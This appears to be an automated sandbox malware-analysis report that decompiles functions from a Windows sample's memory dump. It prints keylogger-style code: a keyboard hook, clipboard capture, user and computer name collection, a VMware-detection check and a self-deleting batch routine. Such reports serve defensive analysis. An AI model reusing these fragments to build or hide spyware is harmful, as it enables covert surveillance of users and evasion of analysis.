                                          C-Code - Quality: 28%
                                          			E0040E549(intOrPtr _a4) {
                                          				char _v5;
                                          				char _v12;
                                          				long _v16;
                                          				char _v32;
                                          				void* _v48;
                                          				char _v80;
                                          				short _v592;
                                          				char* _t23;
                                          				char* _t25;
                                          
                                          				_v12 = 0x10;
                                          				 *0x415b98(1,  &_v80,  &_v12);
                                          				_v16 = 0x100;
                                          				GetUserNameW( &_v592,  &_v16);
                                          				_t23 =  &_v5;
                                          				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
                                          				_t25 =  &_v32;
                                          				L0040FC50();
                                          				L0040FC3E();
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				return _a4;
                                          			}












                                          0x0040e555
                                          0x0040e563
                                          0x0040e56c
                                          0x0040e57b
                                          0x0040e58b
                                          0x0040e594
                                          0x0040e59f
                                          0x0040e5a3
                                          0x0040e5af
                                          0x0040e5ba
                                          0x0040e5c3
                                          0x0040e5cd

                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,00407C11), ref: 0040E563
                                          • GetUserNameW.ADVAPI32(?,?), ref: 0040E57B
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00411848,?,?), ref: 0040E594
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040E5A3
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 0040E5AF
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5BA
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5C3
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@NameV?$basic_string@$??0?$basic_string@ComputerG@1@@UserV10@V10@@
                                          • String ID:
                                          • API String ID: 1350679479-0
                                          • Opcode ID: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                                          • Instruction ID: f1d4da816d663859cec578e5c7d94290c2f1c89324f161e9baf60459a55de7f2
                                          • Opcode Fuzzy Hash: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                                          • Instruction Fuzzy Hash: 90018CB5C0110DABDB11DB94EC49EDE7B7CEB08304F108176F915E2191EB74A68DCBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E0040CA41() {
                                          				void* _v8;
                                          				intOrPtr _v12;
                                          				struct _TOKEN_PRIVILEGES _v24;
                                          				signed int _t14;
                                          
                                          				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                                          				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                          				_v24.PrivilegeCount = 1;
                                          				_v12 = 2;
                                          				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                          				_t14 = GetLastError();
                                          				asm("sbb eax, eax");
                                          				return  ~( ~_t14);
                                          			}







                                          0x0040ca55
                                          0x0040ca67
                                          0x0040ca78
                                          0x0040ca7f
                                          0x0040ca86
                                          0x0040ca8c
                                          0x0040ca94
                                          0x0040ca9a

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?,00415268), ref: 0040CA4E
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040CA55
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040CA67
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040CA86
                                          • GetLastError.KERNEL32 ref: 0040CA8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                                          • Instruction ID: b55852355777b42c5cafdc737e44021a98442e900811cd24b975246bc46e5c25
                                          • Opcode Fuzzy Hash: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                                          • Instruction Fuzzy Hash: 6DF05871801129BBDB00ABA1ED0DEEF7EBCEF09358F104020B506E2090C6B45A88CBB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00408150(void** _a4) {
                                          				void* _t4;
                                          				long _t5;
                                          				struct HRSRC__* _t7;
                                          
                                          				_t7 = FindResourceA(0, "SETTINGS", 0xa);
                                          				_t4 = LockResource(LoadResource(0, _t7));
                                          				_t5 = SizeofResource(0, _t7);
                                          				 *_a4 = _t4;
                                          				return _t5;
                                          			}






                                          0x00408164
                                          0x00408170
                                          0x0040817b
                                          0x00408185
                                          0x00408189

                                          APIs
                                          • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                                          • LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                                          • LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                                          • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID: SETTINGS
                                          • API String ID: 3473537107-594951305
                                          • Opcode ID: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                                          • Instruction ID: 01db6dd320cb8d17c195901b687e59d16bc98a51b3a2c1f815eadbb7ce5068f8
                                          • Opcode Fuzzy Hash: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                                          • Instruction Fuzzy Hash: C9E0BF35680314BBD6201BA5BC0DF977E68EB8AB62F004025F70DC6190DAB1444087A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 27%
                                          			E004050FC(void* __ecx, intOrPtr _a4) {
                                          				char _v5;
                                          				void* _t15;
                                          
                                          				if(OpenClipboard(0) == 0) {
                                          					L3:
                                          					_push( &_v5);
                                          					_push(0x410668);
                                          				} else {
                                          					_t15 = GetClipboardData(1);
                                          					CloseClipboard();
                                          					if(_t15 == 0) {
                                          						goto L3;
                                          					} else {
                                          						_push( &_v5);
                                          						_push(_t15);
                                          					}
                                          				}
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                          				return _a4;
                                          			}





                                          0x0040510b
                                          0x00405128
                                          0x0040512b
                                          0x0040512c
                                          0x0040510d
                                          0x00405115
                                          0x00405117
                                          0x0040511f
                                          0x00000000
                                          0x00405121
                                          0x00405124
                                          0x00405125
                                          0x00405125
                                          0x0040511f
                                          0x00405134
                                          0x0040513f

                                          APIs
                                          • OpenClipboard.USER32(00000000), ref: 00405103
                                          • GetClipboardData.USER32 ref: 0040510F
                                          • CloseClipboard.USER32(?,00405184,?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 00405117
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?,?,00405184,?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 00405134
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                          • String ID:
                                          • API String ID: 1727351239-0
                                          • Opcode ID: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                                          • Instruction ID: 906847f47c7b4b11390f21f1ccf552f120e036e9c6eec0ef59ca3d1b5a3ea75f
                                          • Opcode Fuzzy Hash: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                                          • Instruction Fuzzy Hash: E6E06D75A41218BFD7409B50DC49FEFBBACEB48B41F008132BD05EA280D7B49981CAA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040818A(void* __ecx, char _a4) {
                                          				char _v5;
                                          				char _v8;
                                          
                                          				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
                                          				_t5 =  &_a4; // 0x415268
                                          				return  *_t5;
                                          			}





                                          0x0040819b
                                          0x004081ac
                                          0x004081b2
                                          0x004081b6

                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro), ref: 0040819B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro,00415268,?), ref: 004081AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                          • String ID: hRA
                                          • API String ID: 4090406865-819137882
                                          • Opcode ID: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                                          • Instruction ID: 1a47b6e8894e7d79e7ab4b57d9db25869eba35aadfc9e332033dbe3f11390d94
                                          • Opcode Fuzzy Hash: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                                          • Instruction Fuzzy Hash: 2EE0127560020DFBDB40CB90DC45FCE77BCEB08749F004051BA06D7190D6B0EB488B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004038DB(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
                                          				void* _t19;
                                          				void* _t26;
                                          				struct HHOOK__** _t32;
                                          				signed int _t33;
                                          
                                          				_t32 = _a4;
                                          				_t33 = 5;
                                          				memcpy( &(_t32[0xf]), _a16, _t33 << 2);
                                          				if(_a8 == 0) {
                                          					_t19 = _a12 - 0x100;
                                          					if(_t19 == 0) {
                                          						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
                                          							_t32[0xb] = _t32[0xb] & 0x00000000;
                                          						} else {
                                          							_t32[0xb] = 1;
                                          						}
                                          						E004050B4(_t32);
                                          						E004050D8(_t32);
                                          						E004043BF(_t32);
                                          						if(_t32[0xb] == 0) {
                                          							E00404E5F(_t32);
                                          						}
                                          						_t32[0xb] = _t32[0xb] & 0x00000000;
                                          					} else {
                                          						_t26 = _t19 - 1;
                                          						if(_t26 == 0) {
                                          							E004050C6(_t32);
                                          							E004050EA(_t32);
                                          							E0040506E(_t32);
                                          						} else {
                                          							if(_t26 == 3) {
                                          								E00404FDE(_t32);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return CallNextHookEx( *_t32, _a8, _a12, _a16);
                                          			}







                                          0x004038e3
                                          0x004038f0
                                          0x004038f1
                                          0x004038f3
                                          0x004038f8
                                          0x004038fd
                                          0x00403934
                                          0x00403946
                                          0x00403940
                                          0x00403940
                                          0x00403940
                                          0x0040394c
                                          0x00403953
                                          0x0040395a
                                          0x00403963
                                          0x00403967
                                          0x00403967
                                          0x0040396c
                                          0x004038ff
                                          0x004038ff
                                          0x00403900
                                          0x00403912
                                          0x00403919
                                          0x00403920
                                          0x00403902
                                          0x00403905
                                          0x00403909
                                          0x00403909
                                          0x00403905
                                          0x00403900
                                          0x004038fd
                                          0x00403985

                                          APIs
                                          • GetKeyState.USER32(00000014), ref: 0040392F
                                          • GetKeyState.USER32(00000014), ref: 00403938
                                            • Part of subcall function 00404FDE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410A64,?), ref: 0040505E
                                          • CallNextHookEx.USER32(?,00000000,?,?), ref: 0040397B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                          • String ID:
                                          • API String ID: 98962008-0
                                          • Opcode ID: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                                          • Instruction ID: 016176dd5e4550907043258ced9a7594ac35f6d0ba92dea6ea93643b686b713f
                                          • Opcode Fuzzy Hash: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                                          • Instruction Fuzzy Hash: 6611DDB220020987DF00AF35CC80BAF3A199B48355F00403EAA423A2D3CABD8D149B9E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E00401102(void* __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				intOrPtr _t28;
                                          
                                          				_push(0xffffffff);
                                          				_push(0x410510);
                                          				_push(0x40fc60);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t28;
                                          				_v28 = _t28 - 0xc;
                                          				_v32 = 1;
                                          				_v8 = _v8 & 0x00000000;
                                          				_push(_t13);
                                          				asm("in eax, dx");
                                          				_v32 = 0 == 0x564d5868;
                                          				_v8 = _v8 | 0xffffffff;
                                          				 *[fs:0x0] = _v20;
                                          				return _v32;
                                          			}








                                          0x00401105
                                          0x00401107
                                          0x0040110c
                                          0x00401117
                                          0x00401118
                                          0x00401125
                                          0x00401128
                                          0x0040112c
                                          0x00401132
                                          0x00401147
                                          0x0040114e
                                          0x00401162
                                          0x0040116c
                                          0x00401177

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: hXMV$hXMV
                                          • API String ID: 0-400149659
                                          • Opcode ID: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                                          • Instruction ID: eaa8797a659175eabba1fc64c3000a1aeaf6329f201fbe84486763329dbd0212
                                          • Opcode Fuzzy Hash: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                                          • Instruction Fuzzy Hash: 67F0F672E08789ABD7048759DD92BAFFBB8E745B20F30463AF021636C1D27919018AA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040374A(void* __ecx) {
                                          				signed int _t3;
                                          				signed int _t4;
                                          				intOrPtr _t6;
                                          				intOrPtr _t7;
                                          				void* _t8;
                                          
                                          				_t8 = __ecx;
                                          				_t3 = GetKeyboardLayout(0);
                                          				_t4 = _t3 & 0x000003ff;
                                          				_t6 = 9;
                                          				if(_t4 == _t6) {
                                          					L3:
                                          					 *((intOrPtr*)(_t8 + 0x34)) = _t6;
                                          					return _t4;
                                          				} else {
                                          					_t7 = 0x10;
                                          					if(_t4 != _t7) {
                                          						goto L3;
                                          					} else {
                                          						 *((intOrPtr*)(_t8 + 0x34)) = _t7;
                                          						return _t4;
                                          					}
                                          				}
                                          			}








                                          0x0040374b
                                          0x0040374f
                                          0x00403757
                                          0x0040375c
                                          0x00403760
                                          0x0040376f
                                          0x0040376f
                                          0x00403773
                                          0x00403762
                                          0x00403764
                                          0x00403768
                                          0x00000000
                                          0x0040376a
                                          0x0040376a
                                          0x0040376e
                                          0x0040376e
                                          0x00403768

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayout
                                          • String ID:
                                          • API String ID: 194098044-0
                                          • Opcode ID: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                                          • Instruction ID: 2df3cf34392ab381e4f069577e8eaff7fdb13a446b1c8ff3861ab48797279b8b
                                          • Opcode Fuzzy Hash: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                                          • Instruction Fuzzy Hash: 59D0A7B794A3200EF6A4BB6CBA427E13784EB50B21F85903FE5801BAC8D4E469C20658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004011A3(void* __ecx) {
                                          				intOrPtr _v8;
                                          
                                          				if( *[ds:eax] == 0x70) {
                                          					_v8 = 1;
                                          				} else {
                                          					_v8 = 0;
                                          				}
                                          				return 0 | _v8 != 0x00000000;
                                          			}




                                          0x004011b6
                                          0x004011c1
                                          0x004011b8
                                          0x004011b8
                                          0x004011b8
                                          0x004011d1

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                                          • Instruction ID: 1364cb1d12eabb9626d35066541146f39bd6914f24beff9e251c0f817e1c4944
                                          • Opcode Fuzzy Hash: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                                          • Instruction Fuzzy Hash: D0D05E70611144EBCB04CB58C94574E76F8A705744F604865D001EB290C278EE40E704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406D6B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406D90
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415918,00410668,74B5FBA0), ref: 00406DBF
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415918,00410668,74B5FBA0), ref: 00406DED
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406E0D
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415918,00410668,74B5FBA0), ref: 00406E29
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406E32
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000000), ref: 00406E4C
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406E73
                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406EA2
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,74B5FBA0), ref: 00405263
                                            • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406E7D
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406E85
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406EB6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406EC8
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00406ECF
                                          • getenv.MSVCRT ref: 00406EE4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406EEF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406EFA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F07
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F12
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F1B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,00000001), ref: 00406F28
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406F35
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406F41
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406F61
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406F79
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406F89
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F96
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406FA3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FAE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FB7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FC0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406FDF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406FEF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406FFC
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00407009
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407014
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040701D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407026
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00407032
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00407049
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407056
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00407063
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040706E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407077
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,?,00410F2C), ref: 0040708B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407098
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 004070A5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B9
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070CB
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070D9
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070E4
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000), ref: 004070F2
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 004070FF
                                          • exit.MSVCRT ref: 00407106
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407112
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040711B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407124
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
